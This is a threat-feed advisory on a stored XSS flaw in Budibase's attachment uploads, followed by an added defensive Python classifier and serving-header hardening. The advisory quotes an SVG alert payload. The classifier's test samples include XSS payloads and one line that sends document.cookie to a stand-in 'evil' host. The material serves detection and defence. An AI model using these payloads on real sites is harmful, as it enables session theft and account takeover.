{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/products/budibase--3.38.2/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["budibase (\u003c 3.38.2)"],"_cs_severities":["high"],"_cs_tags":["xss","file-upload","budibase","cve-2026-46426"],"_cs_type":"advisory","_cs_vendors":["Budibase"],"content_html":"\u003cp\u003eBudibase, a low-code platform, is susceptible to a stored cross-site scripting (XSS) vulnerability (CVE-2026-46426) affecting versions prior to 3.38.2. The vulnerability stems from the \u003ccode\u003e/api/attachments/process\u003c/code\u003e endpoint, which inadequately restricts the upload of files with dangerous content. Authenticated users with builder privileges can upload malicious files, such as SVG files containing inline JavaScript, HTML pages with embedded scripts, or JavaScript modules. These files are stored with correct MIME types in the object store (MinIO/S3). Subsequently, when any application user accesses a screen containing the URL of the uploaded file, the browser executes the malicious payload, potentially leading to session cookie theft and full account takeover. 
This issue impacts both application end-users and builder accounts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker authenticates to Budibase as a user with the Builder role via \u003ccode\u003ePOST /api/global/auth/default/login\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe server responds with a JWT and CSRF token embedded within the session.\u003c/li\u003e\n\u003cli\u003eThe attacker extracts the CSRF token from the session.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious SVG file containing an XSS payload, such as \u003ccode\u003e\u0026lt;svg xmlns=\u0026quot;http://www.w3.org/2000/svg\u0026quot;\u0026gt;\u0026lt;script\u0026gt;alert(document.domain)\u0026lt;/script\u0026gt;\u0026lt;/svg\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the malicious SVG file to the \u003ccode\u003e/api/attachments/process\u003c/code\u003e endpoint using a \u003ccode\u003ePOST\u003c/code\u003e request with the \u003ccode\u003eContent-Type\u003c/code\u003e set to \u003ccode\u003emultipart/form-data\u003c/code\u003e and including the CSRF token.\u003c/li\u003e\n\u003cli\u003eThe server stores the SVG file in the object store (MinIO/S3) with the correct MIME type (\u003ccode\u003eimage/svg+xml\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe server returns a JSON response containing the URL of the uploaded file, such as \u003ccode\u003ehttp://target:10000/files/signed/.../\u0026lt;uuid\u0026gt;.svg?X-Amz-...\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eAn end user accesses a screen within the Budibase application that includes the URL of the uploaded SVG file, causing the browser to execute the embedded JavaScript. This results in XSS.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerability allows for persistent stored XSS on any screen displaying the attachment URL. 
Successful exploitation can lead to session cookie theft, resulting in full account takeover for application end-users. Furthermore, if a malicious URL is shared within the workspace, such as in a table attachment or embedded image, the XSS can fire in a builder\u0026rsquo;s session, potentially leading to workspace takeover. The number of affected users depends on the scale of the Budibase application and the visibility of the malicious attachment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Budibase to version 3.38.2 or later to patch CVE-2026-46426.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Budibase Suspicious SVG Upload\u0026rdquo; to monitor for the upload of SVG files containing \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tags.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Budibase Attachment Request with SVG Extension\u0026rdquo; to monitor for requests to uploaded SVG attachments.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-19T16:33:54Z","date_published":"2026-05-19T16:33:54Z","id":"https://feed.craftedsignal.io/briefs/2026-05-budibase-xss/","summary":"Budibase is vulnerable to persistent stored XSS (CVE-2026-46426) due to unrestricted file upload of active content by authenticated users, leading to potential session cookie theft and account takeover.","title":"Budibase Stored XSS Vulnerability via Unrestricted File Upload (CVE-2026-46426)","url":"https://feed.craftedsignal.io/briefs/2026-05-budibase-xss/"}],"language":"en","title":"CraftedSignal Threat Feed — Budibase (\u003c 3.38.2)","version":"https://jsonfeed.org/version/1.1"}
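The feed entry above describes the gap (the upload endpoint accepting SVG, HTML and JavaScript bodies and serving them with their native MIME types) and recommends a Sigma rule that looks for a `<script>` tag in uploaded SVGs. The following is an added example written for this page, not Budibase code and not the upstream fix: an upload-time classifier that decides whether an attachment is active content a browser would execute when it is later rendered from the object-store URL, plus a serve-time fallback that downgrades anything active to an inert download. It goes beyond the `<script>` check the rule names and also flags event-handler attributes, `javascript:` URLs, `<foreignObject>`, HTML and JavaScript MIME types and extensions, and an SVG body hiding behind an `image/png` declaration. The deny lists, the response headers and every sample upload are the editor's assumptions, constructed for the example.

```python
"""Added example (editor's code, not Budibase's): decide whether an uploaded
attachment is active content a browser would execute when it is rendered
from the object-store URL. The advisory's Sigma rule looks for a <script>
tag in an SVG; this also flags event-handler attributes, javascript: URLs,
<foreignObject>, HTML/JavaScript MIME types and extensions, and SVG bodies
hiding behind an image/* content type. All sample uploads are constructed."""
import re
import xml.etree.ElementTree as ET  # production code: parse with defusedxml
from dataclasses import dataclass, field

# Types/extensions a browser renders as a document or runs as script.
# Assumption: this deny list is the editor's, not Budibase's configuration.
ACTIVE_MIME = {"text/html", "application/xhtml+xml", "text/javascript",
               "application/javascript", "application/x-javascript",
               "text/ecmascript", "application/ecmascript"}
ACTIVE_EXT = {".html", ".htm", ".xhtml", ".js", ".mjs"}
SVG_EXT = {".svg", ".svgz"}
SCRIPT_URL = re.compile(r"^\s*(?:javascript|vbscript|data:text/html)", re.I)
HTML_MARKERS = re.compile(rb"<\s*(?:!doctype\s+html|html|script|iframe|object|embed)\b", re.I)


@dataclass
class Verdict:
    active: bool
    reasons: list[str] = field(default_factory=list)


def _local(qname: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qname.rsplit("}", 1)[-1].lower()


def svg_findings(data: bytes) -> list[str]:
    """List SVG constructs that execute script when the file is rendered."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["svg: not well-formed XML; refusing to guess, treat as active"]
    reasons = []
    for el in root.iter():
        name = _local(el.tag) if isinstance(el.tag, str) else ""
        if name == "script":
            reasons.append("svg: <script> element")
        elif name == "foreignobject":
            reasons.append("svg: <foreignObject> embeds HTML")
        for attr, value in el.attrib.items():
            a = _local(attr)  # xlink:href arrives namespaced; compare local name
            if a.startswith("on"):
                reasons.append(f"svg: event handler {a}= on <{name}>")
            elif a in ("href", "src") and SCRIPT_URL.match(value):
                reasons.append(f"svg: script URL in {a}= on <{name}>")
    return reasons


def classify_upload(filename: str, content_type: str, data: bytes) -> Verdict:
    """Upload-time check: anything with a reason should be rejected before a
    signed URL to it is ever handed out to other users."""
    reasons = []
    ct = content_type.split(";", 1)[0].strip().lower()
    ext = ("." + filename.rsplit(".", 1)[1].lower()) if "." in filename else ""
    if ct in ACTIVE_MIME:
        reasons.append(f"mime: {ct} is rendered/executed by browsers")
    if ext in ACTIVE_EXT:
        reasons.append(f"ext: {ext} is rendered/executed by browsers")
    head = data[:4096].lstrip()
    if head.startswith(b"\x1f\x8b"):  # .svgz is gzip-compressed SVG
        reasons.append("content: compressed, cannot inspect; treat as active")
    elif ct == "image/svg+xml" or ext in SVG_EXT or b"<svg" in head.lower():
        reasons.extend(svg_findings(data))
    elif HTML_MARKERS.search(head):
        reasons.append("content: HTML markers in a non-HTML upload")
    return Verdict(active=bool(reasons), reasons=reasons)


def response_headers(filename: str, content_type: str, data: bytes) -> dict[str, str]:
    """Serve-time defence in depth (editor's hardening, not the upstream fix):
    active content is sent as an inert download instead of being rendered in
    the app origin, where its script would read the session cookie."""
    safe_name = re.sub(r"[^\w.\-]", "_", filename) or "download"
    headers = {"X-Content-Type-Options": "nosniff"}
    if classify_upload(filename, content_type, data).active:
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{safe_name}"'
    else:
        headers["Content-Type"] = content_type
        headers["Content-Disposition"] = f'inline; filename="{safe_name}"'
    return headers


# Constructed uploads: the advisory's own payload, an SVG with no <script>
# tag that still runs code, a benign SVG, a plain PNG, an HTML page, and an
# SVG body declared as image/png.
ADVISORY_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.domain)</script></svg>'
SNEAKY_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
              b'<a xlink:href="javascript:alert(1)"><rect width="8" height="8" onload="alert(2)"/></a></svg>')
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLES = [
    ("logo.svg", "image/svg+xml", ADVISORY_SVG),
    ("icon.svg", "image/svg+xml", SNEAKY_SVG),
    ("clean.svg", "image/svg+xml", CLEAN_SVG),
    ("photo.png", "image/png", PNG),
    ("page.html", "text/html", b"<!doctype html><script>fetch('//evil/'+document.cookie)</script>"),
    ("not-a-photo.png", "image/png", ADVISORY_SVG),
]


def scan_samples() -> dict[str, Verdict]:
    return {name: classify_upload(name, ct, body) for name, ct, body in SAMPLES}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name:16} {'ACTIVE' if verdict.active else 'inert '} {'; '.join(verdict.reasons)}")
```

The `reasons` strings are deliberately stable so they can be logged at upload time; a rule watching that log field catches the event-handler and `javascript:` variants that a plain `<script>` match misses. Note the conservative choices: a `.svg` that does not parse and a gzip-compressed `.svgz` are both treated as active rather than guessed at, because the alternative is serving unknown bytes as `image/svg+xml` in the application origin.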